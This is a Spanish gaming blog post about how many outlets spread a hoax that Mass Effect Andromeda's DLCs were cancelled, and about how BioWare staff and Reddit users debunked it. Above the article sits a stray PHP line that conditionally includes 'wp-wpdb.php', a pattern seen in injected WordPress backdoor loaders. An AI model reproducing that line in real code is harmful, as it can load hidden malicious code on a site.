if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Bulos y videojuegos, el caso de Mass Effect Andromeda – La Fortaleza de LeChuck

Bulos y videojuegos, el caso de Mass Effect Andromeda

Hoy iba a hablar de Nintendo + especulación pero total, ya nos hemos acostumbrado, y además están consiguiendo el efecto llamada que quieren volviendo locos hasta a los cuerdos. Así que, queridos amigos, os voy a hablar de algo aún peor y más preocupante, los bulos en los videojuegos con el caso más reciente con el que me he topado que, como no podía ser de otra forma, tiene que ver con Mass Effect Andromeda. Sed bienvenidos a la era de las noticias falsas.

Los bulos están a la orden del día en cuestiones políticas y económicas dentro de la red, y es una lacra que está dando mucho de que hablar. Dado el preocupante aumento y difusión de las «Fake News», empresas como Facebook han aplicado cambios en su algoritmo para mitigar la filtración de estas noticias falsas. Además, han nacido cuentas como Maldito Bulo que desmienten estas informaciones. Desgraciadamente, los bulos se están expandiendo por más temáticas y desde hace algún tiempo están presentes en los videojuegos.

Hoy en día con Internet es muy fácil inventarse noticias. Tan solo hay que escribir un texto agresivo, apañar unas cuentas imágenes que llamen la atención y, si hiciera falta, crear algunas empresas ficticias para hacer más creíble el contenido. Automáticamente esa noticia impactante atraerá a curiosos y las webs se harán eco. Todas las páginas se tirarán de los pelos por ser las primeras en publicarlo y conseguir así más RT y Likes. ¡Tonto el último! El resultado de todo ello es un cóctel explosivo compuesto de Fake News + clickbait. La nueva era de Internet.

Pero vayamos al asunto del título. Ayer mismo un montón de medios de videojuegos publicaban que los DLCs de Mass Effect Andromeda habían sido cancelados. Un titular explosivo ideal para una temporada sin apenas noticias que consiguió que todo el mundo hiciera clic al segundo. En la noticia se hablaba de que una extraña empresa llamada «Sinclair Networks» confirmaba la cancelación de los DLCs de historia de Mass Effect Andromeda y se aportaba una curiosa captura de su página de Facebook como prueba:

La página ya ha sido eliminada pero esta fue la última publicación que hizo saltar las alarmas

Total, que vieron una captura de una supuesta empresa que no conoce ni su prima Eusebia, le añadieron el archiconocido tema de las animaciones, un chorro generoso de la investigación del CSI de Kotaku y una pizca de «Anthem se lo llevó todo a dos manos», y ya tenían la «Fake New» perfecta. Al cabo de unos minutos, los usuarios que leyeron el texto catastrófico, expresaban su indignación en los comentarios y se podían leer cosas como «se veía venir», «yo me alegro, menuda basura de juego con las animaciones bla, bla». Tres páginas de comentarios después, algún usuario tímidamente comentaba que era «fake» y aportaba enlaces del equipo de Bioware. ¡Caramba! ¡Alguien que ha decidido comprobar la veracidad de la noticia por medios oficiales!

Como viene siendo habitual, las páginas extranjeras fueron las primeras en publicar la noticia y, más tarde, llegaron las españolas, pero para entonces algunos miembros de Bioware ya habían desmentido la noticia.

¿Pero acaso importa? Es una noticia falsa que impacta sobre un juego que ya tiene una triste fama detrás y todo clavo que se le pueda poner a su ataúd se refleja en visitas. Algunas páginas rectificaron y editaron la noticia indicando que es desmiente la información pero otras webs simplemente lanzaron una nueva noticia para decir que la compañía no lo había confirmado. Más visitas.

Análisis Mass Effect Andromeda

 

Así que nos encontramos ante la lamentable situación de un buen número de redactores que no se preocupan por contrastar información a través de fuentes oficiales, ni en investigar un poco. Atrás quedó la profesionalidad, ahora el primero que publica se lleva el premio. Por suerte, algunos usuarios no se lo tragaron y en Reddit estuvieron indagando sobre la sospechosa compañía. Estos fueron los resultados:

No era tan difícil, ¿no?

Pero alguien hizo algo incluso mejor, preguntar directamente al equipo de Mass Effect Andromeda:

 

Para despejar aún más dudas, Fernando Melo, productor del juego, publicó lo siguiente:

Si seguís los tuits de Melo, veréis que también subraya que no pueden ofrecer más información por temas legales. No obstante, el daño ya está hecho, y los trolls junto a la prensa del clickbait se están convirtiendo en un deplorable equipo que colabora estrechamente hacia la desinformación.

Y ahora bien, ¿qué podemos hacer? Pues para empezar, no quedarse con lo primero que se lee y contrastar información a través de fuentes oficiales. Y por otro lado, castigar a esos medios que difunden frecuentemente información falsa dejándolos de seguir para ver si así comprenden que la profesionalidad y el rigor deben estar por encima de las visitas.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario